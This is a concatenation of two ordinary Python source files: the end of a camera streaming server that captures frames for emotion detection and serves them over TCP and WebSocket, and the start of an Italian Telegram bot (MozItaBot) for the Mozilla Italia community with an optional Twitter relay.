self._enabled_clients.add(client)
elif command is ClientCommand.DISABLE:
self._enabled_clients.remove(client)
elif command == ClientCommand.STOP:
self._enabled_clients.remove(client)
if self._clients.remove(client):
client.stop()
logger.info('Number of active clients: %d', len(self._clients))
elif command is ClientCommand.RESET:
for cl in self._enabled_clients:
cl.send_reset_message()
logger.info('Reset command sent')
elif command is ClientCommand.YES:
for cl in self._enabled_clients:
cl.send_response_message(correct=True)
logger.info('Response sent')
elif command is ClientCommand.NO:
for cl in self._enabled_clients:
cl.send_response_message(correct=False)
logger.info('Response sent')
elif command is ClientCommand.STATS:
self._get_stats()
elif command is ClientCommand.FRAME:
for cl in self._enabled_clients:
cl.send_processing_message()
# Remove photos from assets/emotion_files to clear out data from previous runs
assets_path = '/home/mendel/emotion-mesh/local-detector/streaming/assets/emotion-files/'
sd_path = '/disk1/images/'
for afile in os.listdir(assets_path):
file_path = os.path.join(assets_path, afile)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
logger.warning('Error removing files: ' + str(e))
captured_frame = self._camera.capture_frame()
logger.info('Frame captured: ' + captured_frame)
# Copy photo into cloud-detector folder
cloud_path = '/home/mendel/emotion-mesh/cloud-detector/images/'
copyfile(captured_frame, cloud_path + captured_frame)
time.sleep(.500)
# Move photo into local-detector folder
local_path = '/home/mendel/emotion-mesh/local-detector/images/'
os.rename(captured_frame, local_path + captured_frame)
# Call cloud detector
faceDictionary = perform_cloud_detection(captured_frame)
# Save result to backend
if not faceDictionary:
logger.info('No faces detected. Resetting...')
else:
globals.last_image = os.path.splitext(captured_frame)[0]
emotionBackend.createResult(globals.last_image, faceDictionary)
# Call local detector
# TODO: This requires some additional work and a TF2.0 port of an existing emotion model to work
root_mod_file = os.path.splitext(captured_frame)[0] + '_modified.png'
# Move modified photo into streaming/assets folder
copyfile(cloud_path + root_mod_file, assets_path + captured_frame)
# Move original and results files to SD Card
logger.info('Processing complete. Moving images to SD and performing cleanup.')
move(cloud_path + root_mod_file, sd_path)
# Call back to client with results image and emotion model result
for cl in self._clients: # Send to all clients, including serial monitor
cl.send_detection_result(os.path.splitext(captured_frame)[0] + '.png', str(faceDictionary))
move(cloud_path + captured_frame, sd_path)
# Cleanup the local file
os.remove(local_path + captured_frame)
logger.info('Cleanup complete!')
is_streaming = bool(self._enabled_clients)
if not was_streaming and is_streaming:
self._start_recording()
if was_streaming and not is_streaming:
self._stop_recording()
def _run(self, mdns_name, tcp_port, web_port, annexb_port):
try:
with contextlib.ExitStack() as stack:
logger.info('Listening on ports tcp: %d, web: %d, annexb: %d',
tcp_port, web_port, annexb_port)
tcp_socket = stack.enter_context(Socket(tcp_port))
web_socket = stack.enter_context(Socket(web_port))
annexb_socket = stack.enter_context(Socket(annexb_port))
if mdns_name:
stack.enter_context(PresenceServer(mdns_name, tcp_port))
socks = (tcp_socket, web_socket, annexb_socket)
while not self._done.is_set():
# Process available client commands.
try:
while True:
client, command = self._commands.get_nowait()
self._process_command(client, command)
except queue.Empty:
pass # Done processing commands.
# Process recently connected clients.
rlist, _, _ = select.select(socks, [], [], 0.2) # 200ms
for ready in rlist:
sock, addr = ready.accept()
name = '%s:%d' % addr
if ready is tcp_socket:
client = ProtoClient(name, sock, self._commands, self._camera.resolution)
elif ready is web_socket:
client = WsProtoClient(name, sock, self._commands, self._camera.resolution)
elif ready is annexb_socket:
client = AnnexbClient(name, sock, self._commands)
logger.info('New %s connection from %s', client.TYPE, name)
self._clients.add(client).start()
logger.info('Number of active clients: %d', len(self._clients))
finally:
logger.info('Server is shutting own')
if self._enabled_clients:
self._stop_recording()
for client in self._clients:
client.stop()
logger.info('Done')
def write(self, data):
"""Called by camera thread for each compressed frame."""
assert data[0:4] == b'\x00\x00\x00\x01'
frame_type = data[4] & 0b00011111
if frame_type in ALLOWED_NALS:
states = {client.send_video(frame_type, data) for client in self._enabled_clients}
if ClientState.ENABLED_NEEDS_SPS in states:
logger.info('Requesting key frame')
self._camera.request_key_frame()
class ClientLogger(logging.LoggerAdapter):
def process(self, msg, kwargs):
return '[%s] %s' % (self.extra['name'], msg), kwargs
class ClientState(Enum):
DISABLED = 1
ENABLED_NEEDS_SPS = 2
ENABLED = 3
class ClientCommand(Enum):
STOP = 1
ENABLE = 2
DISABLE = 3
FRAME = 4
RESET = 5
YES = 6
NO = 7
STATS = 8
class Client:
def __init__(self, name, sock, command_queue):
self._lock = threading.Lock() # Protects _state.
self._state = ClientState.DISABLED
self._logger = ClientLogger(logger, {'name': name})
self._socket = sock
self._commands = command_queue
self._tx_q = DroppingQueue(15)
self._rx_thread = threading.Thread(target=self._rx_run)
self._tx_thread = threading.Thread(target=self._tx_run)
def start(self):
self._rx_thread.start()
self._tx_thread.start()
def stop(self):
self._logger.info('Stopping...')
_shutdown(self._socket)
self._socket.close()
self._tx_q.put(None)
self._tx_thread.join()
self._rx_thread.join()
self._logger.info('Stopped.')
def send_video(self, frame_type, data):
"""Only called by camera thread."""
with self._lock:
if self._state == ClientState.DISABLED:
pass
elif self._state == ClientState.ENABLED_NEEDS_SPS:
if frame_type == NAL.SPS:
dropped = self._queue_video(data)
if not dropped:
self._state = ClientState.ENABLED
elif self._state == ClientState.ENABLED:
dropped = self._queue_video(data)
if dropped:
self._state = ClientState.ENABLED_NEEDS_SPS
return self._state
def send_overlay(self, svg):
"""Can be called by any user thread."""
with self._lock:
if self._state != ClientState.DISABLED:
self._queue_overlay(svg)
def send_reset_message(self):
"""Can be called by any user thread."""
with self._lock:
if self._state != ClientState.DISABLED:
self._queue_reset_message()
def send_processing_message(self):
"""Can be called by any user thread."""
with self._lock:
if self._state != ClientState.DISABLED:
self._queue_processing_message()
def send_response_message(self, correct):
"""Can be called by any user thread."""
with self._lock:
if self._state != ClientState.DISABLED:
self._queue_response_message(correct)
def send_stats_message(self, total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise):
"""Can be called by any user thread."""
with self._lock:
if self._state != ClientState.DISABLED:
self._queue_stats_message(total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise)
def send_detection_result(self, imagePath, emotionResult):
"""Can be called by any user thread."""
with self._lock:
self._queue_detection_result(imagePath, emotionResult)
def _send_command(self, command):
self._commands.put((self, command))
def _queue_message(self, message, replace_last=False):
dropped = self._tx_q.put(message, replace_last)
if dropped:
self._logger.warning('Running behind, dropping messages')
return dropped
def _tx_run(self):
try:
while True:
message = self._tx_q.get()
if message is None:
break
self._send_message(message)
self._logger.info('Tx thread finished')
except Exception as e:
self._logger.warning('Tx thread failed: %s', e)
# Tx thread stops the client in any situation.
self._send_command(ClientCommand.STOP)
def _rx_run(self):
try:
while True:
message = self._receive_message()
if message is None:
break
self._handle_message(message)
self._logger.info('Rx thread finished')
except Exception as e:
self._logger.warning('Rx thread failed: %s', e)
# Rx thread stops the client only if error happened.
self._send_command(ClientCommand.STOP)
def _receive_bytes(self, num_bytes):
received = bytearray()
while len(received) < num_bytes:
buf = self._socket.recv(num_bytes - len(received))
if not buf:
return buf
received.extend(buf)
return received
def _queue_video(self, data):
raise NotImplementedError
def _queue_overlay(self, svg):
raise NotImplementedError
def _send_message(self, message):
raise NotImplementedError
def _receive_message(self):
raise NotImplementedError
def _handle_message(self, message):
pass
class ProtoClient(Client):
TYPE = 'tcp'
def __init__(self, name, sock, command_queue, resolution):
super().__init__(name, sock, command_queue)
self._resolution = resolution
def _queue_video(self, data):
return self._queue_message(VideoMessage(data))
def _queue_overlay(self, svg):
return self._queue_message(OverlayMessage(svg))
def _queue_reset_message(self):
return self._queue_message(ResetMessage())
def _queue_detection_result(self, imagePath, emotionResult):
return self._queue_message(DetectionResultMessage(imagePath, emotionResult))
def _queue_response_message(self, correct):
return self._queue_message(ResponseMessage(correct))
def _queue_stats_message(self, total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise):
return self._queue_message(StatsMessage(total, correct, incorrect, anger, neutral, happiness, contempt, disgust, fear, sadness, surprise))
def _queue_processing_message(self):
return self._queue_message(ProcessingMessage())
def _handle_message(self, message):
which = message.WhichOneof('message')
if which == 'stream_control':
self._handle_stream_control(message.stream_control)
elif which == 'frame_capture':
self._handle_frame_capture(message.frame_capture)
elif which == 'reset':
self._logger.info('Resetting...')
self._send_command(ClientCommand.RESET)
elif which == 'result_stats':
self._logger.info('Received request for stats')
self._send_command(ClientCommand.STATS)
elif which == 'response':
self._logger.info('Detection Correct: ' + str(message.response.correct))
emotionBackend.saveResponse(globals.last_image, message.response.correct)
if (message.response.correct):
self._send_command(ClientCommand.YES)
else:
self._send_command(ClientCommand.NO)
def _handle_frame_capture(self, frame_capture):
overlay = frame_capture.overlay
self._logger.info('frame_capture with overlay %s', overlay)
with self._lock:
self._logger.info('Capturing Frame')
self._send_command(ClientCommand.FRAME)
def _handle_stream_control(self, stream_control):
enabled = stream_control.enabled
self._logger.info('stream_control %s', enabled)
with self._lock:
if self._state == ClientState.DISABLED and not enabled:
self._logger.info('Ignoring stream_control disable')
elif self._state in (ClientState.ENABLED_NEEDS_SPS, ClientState.ENABLED) and enabled:
self._logger.info('Ignoring stream_control enable')
else:
if enabled:
self._logger.info('Enabling client')
self._state = ClientState.ENABLED_NEEDS_SPS
self._queue_message(StartMessage(self._resolution))
self._send_command(ClientCommand.ENABLE)
else:
self._logger.info('Disabling client')
self._state = ClientState.DISABLED
self._queue_message(StopMessage(), replace_last=True)
self._send_command(ClientCommand.DISABLE)
def _send_message(self, message):
buf = message.SerializeToString()
self._socket.sendall(struct.pack('!I', len(buf)))
self._socket.sendall(buf)
def _receive_message(self):
buf = self._receive_bytes(4)
if not buf:
return None
num_bytes = struct.unpack('!I', buf)[0]
buf = self._receive_bytes(num_bytes)
if not buf:
return None
return _parse_server_message(buf)
class WsProtoClient(ProtoClient):
TYPE = 'web'
class WsPacket:
def __init__(self):
self.fin = True
self.opcode = 2
self.masked = False
self.mask = None
self.length = 0
self.payload = bytearray()
def append(self, data):
if self.masked:
data = bytes([c ^ k for c, k in zip(data, cycle(self.mask))])
self.payload.extend(data)
def serialize(self):
self.length = len(self.payload)
buf = bytearray()
b0 = 0
b1 = 0
if self.fin:
b0 |= 0x80
b0 |= self.opcode
buf.append(b0)
if self.length <= 125:
b1 |= self.length
buf.append(b1)
elif self.length >= 126 and self.length <= 65535:
b1 |= 126
buf.append(b1)
buf.extend(struct.pack('!H', self.length))
else:
b1 |= 127
buf.append(b1)
buf.extend(struct.pack('!Q', self.length))
if self.payload:
buf.extend(self.payload)
return bytes(buf)
def __init__(self, name, sock, command_queue, resolution):
super().__init__(name, sock, command_queue, resolution)
self._upgraded = False
def _receive_message(self):
try:
if not self._upgraded:
if self._process_web_request():
return None
self._upgraded = True
packets = []
while True:
packet = self._receive_packet()
if packet.opcode == 0:
# Continuation
if not packets:
self._logger.error('Invalid continuation received')
return None
packets.append(packet)
elif packet.opcode == 1:
# Text, not supported.
self._logger.error('Received text packet')
return None
elif packet.opcode == 2:
# Binary.
packets.append(packet)
if packet.fin:
joined = bytearray()
for p in packets:
joined.extend(p.payload)
return _parse_server_message(joined)
elif packet.opcode == 8:
# Close.
self._logger.info('WebSocket close requested')
return None
elif packet.opcode == 9:
# Ping, send pong.
self._logger.info('Received ping')
response = self.WsPacket()
response.opcode = 10
response.append(packet.payload)
self._queue_message(response)
elif packet.opcode == 10:
# Pong. Igore as we don't send pings.
self._logger.info('Dropping pong')
else:
self._logger.info('Dropping opcode %d', packet.opcode)
except Exception:
self._logger.exception('Error while processing websocket request')
return None
def _receive_packet(self):
packet = self.WsPacket()
buf = self._receive_bytes(2)
packet.fin = buf[0] & 0x80 > 0
packet.opcode = buf[0] & 0x0F
packet.masked = buf[1] & 0x80 > 0
packet.length = buf[1] & 0x7F
if packet.length == 126:
packet.length = struct.unpack('!H', self._receive_bytes(2))[0]
elif packet.length == 127:
packet.length = struct.unpack('!Q', self._receive_bytes(8))[0]
if packet.masked:
packet.mask = self._receive_bytes(4)
packet.append(self._receive_bytes(packet.length))
return packet
def _send_message(self, message):
if isinstance(message, (bytes, bytearray)):
buf = message
else:
if isinstance(message, self.WsPacket):
packet = message
else:
packet = self.WsPacket()
packet.append(message.SerializeToString())
buf = packet.serialize()
self._socket.sendall(buf)
def _process_web_request(self):
request = _read_http_request(self._socket)
request = HTTPRequest(request)
connection = request.headers['Connection']
upgrade = request.headers['Upgrade']
if 'Upgrade' in connection and upgrade == 'websocket':
sec_websocket_key = request.headers['Sec-WebSocket-Key']
self._queue_message(_http_switching_protocols(sec_websocket_key))
self._logger.info('Upgraded to WebSocket')
return False
if request.command == 'GET':
content, content_type = _read_asset(request.path)
if content is None:
self._queue_message(_http_not_found())
else:
self._queue_message(_http_ok(content, content_type))
self._queue_message(None)
return True
raise Exception('Unsupported request')
class AnnexbClient(Client):
TYPE = 'annexb'
def __init__(self, name, sock, command_queue):
super().__init__(name, sock, command_queue)
self._state = ClientState.ENABLED_NEEDS_SPS
self._send_command(ClientCommand.ENABLE)
def _queue_video(self, data):
return self._queue_message(data)
def _queue_overlay(self, svg):
pass # Ignore overlays.
def _send_message(self, message):
self._socket.sendall(message)
def _receive_message(self):
buf = self._socket.recv(1024)
if not buf:
return None
raise RuntimeError('Invalid state.') |
hub_mozita.py | #!/usr/bin/python3
import os
import json
import time
import datetime
import calendar
import telepot
import threading
import telegram_events
import tweepy as ty
from pathlib import Path
from datetime import datetime, timedelta
from configparser import ConfigParser
from telepot.loop import MessageLoop
from telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton
# must be defined at the beginning: while refactoring variable initialization must be
# in another function
def log(stampa, err):
'''
log: log function
'''
global response, data_salvataggio
if err:
stampa = str(response) + "\n\n" + str(stampa)
stampa = stampa + "\n--------------------\n"
try:
# verifica l'esistenza del filela cartella "history_mozitabot", altrimenti la crea
if os.path.exists("./history_mozitabot") == False:
os.mkdir("./history_mozitabot")
except Exception as exception_value:
print("Excep:22 -> " + str(exception_value))
log("Except:22 ->" + str(exception_value), True)
try:
# apre il file in scrittura "append" per inserire orario e data -> log
# di utilizzo del bot (ANONIMO)
file = open("./history_mozitabot/log_" +
str(data_salvataggio) + ".txt", "a", -1, "UTF-8")
# ricordare che l'orario è in fuso orario UTC pari a 0 (Greenwich,
# Londra) - mentre l'Italia è a +1 (CET) o +2 (CEST - estate)
file.write(stampa)
file.close()
except Exception as exception_value:
print("Excep:02 -> " + str(exception_value))
log("Except:02 ->" + str(exception_value), True)
def load_list_from_path(generic_path):
return json.loads(open(generic_path).read()) if Path(generic_path).exists() else []
def load_dict_from_path(generic_path):
return json.loads(open(generic_path).read()) if Path(generic_path).exists() else {}
def fix_username(username):
# add @ character if not provided
if username[0] != "@":
username = "@" + username
return username
def safe_conf_get(config_parser, section, key_name):
'''
returns parsed value if key_name exists in config.ini, null otherwise
'''
try:
return config_parser.get(section, key_name)
except Exception:
print(key_name + " non presente nella sezione " + section + "!")
exit()
######################
# LOADING SECRETS #
######################
# managing config.ini
if not os.path.isfile("config.ini"):
print(
"Il file di configurazione non è presente.\n" +
"Rinomina il file 'config-sample.ini' in 'config.ini' e inserisci i dati mancanti.")
exit()
# useful object to manage secret values
script_path = os.path.dirname(os.path.realpath(__file__))
config_parser = ConfigParser()
config_parser.read(os.path.join(script_path, "config.ini"))
localtime = datetime.now()
data_salvataggio = localtime.strftime("%Y_%m_%d")
###########################
# MANAGING BOT CONSTANTS #
###########################
TOKEN = safe_conf_get(config_parser, "bot", "TOKEN")
NEWS_CHANNEL = safe_conf_get(config_parser, "bot", "NEWS_CHANNEL")
GRUPPI_URL = {
"home": "https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ",
"news": "https://t.me/mozItaNews",
"developers": "https://t.me/+bv2WcZQadHZhMDE0",
"l10n": "https://t.me/mozItaL10n",
"design_marketing": "https://t.me/+SPpi0DHZZ8cHLZ5V"
}
# managing version and last update
versione = "1.6.3.1"
ultimo_aggiornamento = "27-08-2021"
print("(MozItaBot) Versione: " + versione +
" - Aggiornamento: " + ultimo_aggiornamento)
# loading sentences from file
if Path("frasi.json").exists():
frasi = json.loads(open("frasi.json", encoding="utf8").read())
else:
print("File frasi non presente.")
exit()
# setting lists --- almost everything is merged into one single file, to avoid confusion
lists_path = "liste.json"
liste = load_dict_from_path(lists_path)
all_users_path = "all_users.json"
avvisi_on_list_path = "avvisi_on_list.json"
adminlist = []
avvisi_on_list = load_list_from_path(avvisi_on_list_path)
all_users = load_list_from_path(all_users_path)
#######################
# TWITTER INTEGRATION #
#######################
# start time from OS
starttime=time.time()
def updateJSON(data, path):
jsonstr = json.dumps(data, sort_keys=True, indent=4)
jsonfile = open(path, "w")
jsonfile.write(jsonstr)
jsonfile.close()
def get_last_id_posted():
last_twitter_id_path = "last_twitter_id.json"
# managing last post id
last_post_id = load_list_from_path(last_twitter_id_path)
if len(last_post_id) != 1:
print("Errore. Non c'e' un id dell'ultimo post salvato da Twitter nel file last_twitter_id.json")
print("Rinomina il file last_twitter_id-sample.json, inserisci l'id dell'ultimo post e riprova")
exit()
return last_post_id[0]
# init almost everything needed by Twitter
def twitter_init(config_parser, starttime):
# managing twitter tokens
CONSUMER_KEY = safe_conf_get(config_parser, "twitter", "CONSUMER_KEY")
CONSUMER_SECRET = safe_conf_get(config_parser, "twitter", "CONSUMER_SECRET")
ACCESS_TOKEN = safe_conf_get(config_parser, "twitter", "ACCESS_TOKEN")
ACCESS_SECRET = safe_conf_get(config_parser, "twitter", "ACCESS_SECRET")
TWITTER_REFRESH_TIME = float(safe_conf_get(config_parser, "twitter", "TWITTER_REFRESH_TIME"))
TWITTER_SOURCE_ACCOUNT = safe_conf_get(config_parser, "twitter", "TWITTER_SOURCE_ACCOUNT")
# authorizes the code
auth = ty.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
twitter_api = ty.API(auth)
# check if user exists
try:
twitter_api.get_user(TWITTER_SOURCE_ACCOUNT)
except Exception:
print("Nome utente Twitter non valido! Assicurati di aver inserito il nome utente giusto e riprova!")
log("Nome utente Twitter non valido! Assicurati di aver inserito il nome utente giusto e riprova!", True)
exit()
# tuple: it contains Twitter username and lastpostid
user_params = [TWITTER_SOURCE_ACCOUNT,get_last_id_posted()]
threading.Thread(target=fetch_twitter, args=(twitter_api, starttime, TWITTER_REFRESH_TIME, NEWS_CHANNEL, user_params)).start()
# social function: updates twitter -- used by thread
def fetch_twitter(twitter_api, starttime, seconds=300.0, channel_username="@mozitanews", user_params=["MozillaItalia",'1']):
channel_username = fix_username(channel_username)
"""
function to fetch MozillaItalia's Tweets and post them on a channel
"""
if channel_username not in channels_list:
print("Errore! Il canale destinazione dove inoltrare i nuovi post di Twitter è errato, non esiste, non esiste nella channel_list.json o il bot non ha il permesso di scrivere! Assicurati di aver specificato l'username giusto in config.ini")
exit()
while True:
user_params[1] = get_last_id_posted()
get_user_tweet(twitter_api, channel_username, user_params)
time.sleep(seconds - ((time.time() - starttime) % seconds))
# get tweets of a user and post it on a channel
def get_user_tweet(twitter_api, channel_name, user_params=["MozillaItalia",'1']):
'''
get tweets of a user and post it on a channel
'''
global tweet
# get current date and time for time stamp and properly format it
now = datetime.now()
date_time = now.strftime("%d-%m-%Y %H:%M:%S")
user = user_params[0]
old_id = user_params[1]
# fetch user timeline
r = twitter_api.user_timeline(user, count=1, tweet_mode='extended')
last_tweet_id = r[0].id
status = twitter_api.get_status(last_tweet_id, tweet_mode="extended")
# update last post id
if last_tweet_id != old_id:
# defining tweet text depending on the content
try:
tweet = "RT: " + status.retweeted_status.full_text
except AttributeError: # Not a Retweet
tweet = status.full_text
tweet_url = "https://twitter.com/" + user + "/status/" + str(status.id)
# send message to mozitanews
try:
bot.sendMessage(channel_name,
tweet,
parse_mode="HTML",
reply_markup=InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(
text=frasi["view tweet"],
url = tweet_url)]]))
# updates last tweet file
try:
fd = open("last_twitter_id.json", "w")
string = "[" + str(r[0].id) + "]"
fd.write(string)
except Exception:
print("Errore aggiornamento file!")
exit()
print("[" + date_time + "] " + "Tweet -> " + tweet)
except Exception as exception_value:
print("Excep:29 -> " + str(exception_value))
log("Except:29 ->" + str(exception_value), True)
else:
print("[" + date_time + "] " + "Nessun nuovo Tweet. ")
# [TWITTER]: init everything and start
# twitter_init(config_parser, starttime)
##################################################################
response = ""
# array mesi
listaMesi = [
"Gennaio",
"Febbraio",
"Marzo",
"Aprile",
"Maggio",
"Giugno",
"Luglio",
"Agosto",
"Settembre",
"Ottobre",
"Novembre",
"Dicembre"]
# calcola il primo venerdì del mese
def first_friday_of_the_month(year, month):
for day, weekday in calendar.Calendar().itermonthdays2(year, month):
if weekday == 4:
if (day != 0):
return day
else:
return day + 7
def remove_user_from_avvisi_allusers_lists(chat_id, userid_to_remove):
'''
bot.sendMessage(
chat_id,
"‼️❌ <a href='tg://user?id=" +
str(userid_to_remove) + "'>" + str(userid_to_remove) + "</a> rimosso dalla lista.",
parse_mode="HTML")
'''
try:
if (userid_to_remove in avvisi_on_list):
avvisi_on_list.remove(userid_to_remove)
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(
avvisi_on_list).encode("utf-8"))
if (userid_to_remove in all_users):
all_users.remove(userid_to_remove)
with open(all_users_path, "wb") as file_with:
file_with.write(json.dumps(
all_users).encode("utf-8"))
testo_to_print = str(
userid_to_remove) + " rimosso dalla lista all_users (ed eventualmente dalla avvisi_list)"
print(testo_to_print)
log(testo_to_print, False)
except Exception as exception_value:
print("Excep:24 -> " + str(exception_value))
log("Except:24 ->" + str(exception_value), True)
# send a message in a channel
def send_message_channel(channel_name, messaggio, chat_id, optional_text = ""):
try:
bot.sendMessage(channel_name.lower(),
messaggio,
parse_mode="HTML")
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente sul canale <code>" + channel_name.lower() + "</code>" +
".\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
except Exception as exception_value:
print("Excep:25 -> " + str(exception_value))
log("Except:25 ->" + str(exception_value), True)
if optional_text != "":
bot.sendMessage(
chat_id,
optional_text + "canale <code>" + channel_name.lower() + "</code>.\n",
parse_mode="HTML"
)
else:
bot.sendMessage(
chat_id,
"Si è verificato un errore per il canale <code>" + channel_name.lower() + "</code>.\n" +
"Controlla che: \n" +
"- il bot abbia i privilegi giusti\n" +
"- BotFather sia settato correttamente\n" +
"- hai aggiunto l'ID nella lista canali (con la @)\n\n" +
"Se ancora hai problemi potrebbe trattarsi di un errore momentaneo.\n" +
"Riprova più tardi!",
parse_mode="HTML"
)
def send_log(nome_file, chat_id):
if os.path.exists("./history_mozitabot/" + nome_file):
bot.sendMessage(chat_id, "<i>Invio del file " +
nome_file + " in corso</i>", parse_mode="HTML")
bot.sendDocument(chat_id, open(
"./history_mozitabot/" + nome_file, "rb"))
else:
bot.sendMessage(
chat_id, "Il file <i>" + nome_file + "</i> non esiste.", parse_mode="HTML")
def risposte(msg):
global data_salvataggio
global localtime
if isinstance(localtime, str):
localtime = datetime.now()
localtime = localtime.strftime("%d/%m/%y %H:%M:%S")
type_msg = "NM" # Normal Message
status_user = "-" # inizializzazione dello 'status' dell'utente {"A"|"-"}
# Admin, Other
global frasi # frasi è il dictionary globali che contiene tutte le frasi da visualizzare
global response
global adminlist
response = bot.getUpdates()
if not liste["adminlist"] or not liste["adminlist"] == {}:
adminlist = [ int(admin) for admin in list(liste["adminlist"].keys()) ] # definita in liste.json
else:
# nel caso in cui non dovesse esistere alcuna lista admin imposta staticamente l'userid di Sav22999
# -> così da poter confermare anche altri utenti anche se ci sono 'malfunzionamenti' (NON DOVREBBERO ESSERCENE!)
adminlist = [240188083]
# caricamento degli eventi gestiti
eventi_list = {}
eventi_list = telegram_events.events(msg, ["LK", "NM"], response)
text = eventi_list["text"]
type_msg = eventi_list["type_msg"]
query_id = "-"
if type_msg == "BIC" and "id" in msg:
query_id = msg["id"]
link_regolamento = "https://github.com/MozillaItalia/mozitaantispam_bot/wiki/Regolamento"
user_id = msg['from']['id']
if user_id in adminlist:
status_user = "A"
nousername = False
if "username" in msg['from']:
user_name = msg['from']['username']
else:
user_name = "[*NessunUsername*]"
nousername = True
if "chat" not in msg:
msg = msg["message"]
chat_id = msg['chat']['id']
if datetime.now().month == 12:
anno_call = str(datetime.now().year + 1)
mese_call = listaMesi[0]
giorno_call = str(first_friday_of_the_month(int(anno_call), 1))
else:
anno_call = str(datetime.now().year)
giorno_call = first_friday_of_the_month(
int(anno_call), datetime.now().month)
if datetime.now().day >= giorno_call:
mese_call = datetime.now().month + 1
giorno_call = str(first_friday_of_the_month(
int(anno_call), datetime.now().month + 1))
else:
mese_call = datetime.now().month
giorno_call = str(giorno_call)
mese_call = listaMesi[mese_call - 1]
# non è possibile utilizzare la funzione
# datetime.now().(month+1).strftime("%B") perché lo restituisce in
# inglese
home = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_vai_a_home"],
url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
feedback = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_feedback"],
url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ')],
[InlineKeyboardButton(text=frasi["button_feedback2"],
url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
start = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_start"],
callback_data='/help')],
[InlineKeyboardButton(text=frasi["button_start2"],
callback_data='/supporto')],
])
supporto = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_support"], url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ'),
InlineKeyboardButton(text=frasi["button_support2"], callback_data='/forum')],
[InlineKeyboardButton(text=frasi["button_support3"],
url='https://forum.mozillaitalia.org/index.php?board=9.0')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
help = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_testo_gruppi"], callback_data='/gruppi'),
InlineKeyboardButton(
text=frasi["button_testo_social"], callback_data='/social'),
InlineKeyboardButton(text=frasi["button_testo_supporto"], callback_data='/supporto')],
[InlineKeyboardButton(text=frasi["button_testo_avvisi"], callback_data='/avvisi'),
InlineKeyboardButton(
text=frasi["button_testo_call"], callback_data='/meeting'),
InlineKeyboardButton(text=frasi["button_testo_progetti_attivi"], callback_data='/progetti')],
[InlineKeyboardButton(text=frasi["button_testo_vademecum"], callback_data='/vademecum'),
InlineKeyboardButton(
text=frasi["button_testo_regolamento"], callback_data='/regolamento'),
InlineKeyboardButton(text=frasi["button_testo_info"], callback_data='/info')],
[InlineKeyboardButton(text=frasi["button_feedback"],
callback_data='/feedback')],
])
gruppi = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_testo_home"], url=GRUPPI_URL['home']),
InlineKeyboardButton(text=frasi["button_testo_news"], url=GRUPPI_URL['news'])],
[InlineKeyboardButton(text=frasi["button_testo_developers"], url=GRUPPI_URL['developers']),
InlineKeyboardButton(text=frasi["button_testo_L10n"], url=GRUPPI_URL["l10n"])],
[InlineKeyboardButton(text=frasi["button_testo_design_marketing"], url=GRUPPI_URL["design_marketing"])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
developers = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_developers"],
url=GRUPPI_URL['developers'])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
design_marketing = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_design_marketing"],
url=GRUPPI_URL['design_marketing'])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
L10n = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_L10n"],
url=GRUPPI_URL['l10n'])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
vademecum = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_vg"], callback_data='/vademecumGenerale'),
InlineKeyboardButton(text=frasi["button_vt"], callback_data='/vademecumTecnico')],
[InlineKeyboardButton(text=frasi["button_cv"], callback_data='/vademecumCV')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
news = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_news"],
url='https://t.me/mozItaNews')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
forum = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_forum"],
url='https://forum.mozillaitalia.org/')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
call = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_vai_a_canale_youtube"],
url='https://www.youtube.com/channel/UCsTquqVS0AJxCf4D3n9hQ1w')],
[InlineKeyboardButton(text=frasi["button_call2"],
callback_data='/prossimoMeeting')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
load_progetti = [ [InlineKeyboardButton(
text=str(proj), url=liste["progetti"][proj])] for proj in list(liste["progetti"].keys()) ]
load_progetti.append([InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')])
progetti = InlineKeyboardMarkup(inline_keyboard=load_progetti)
load_progettimozita = []
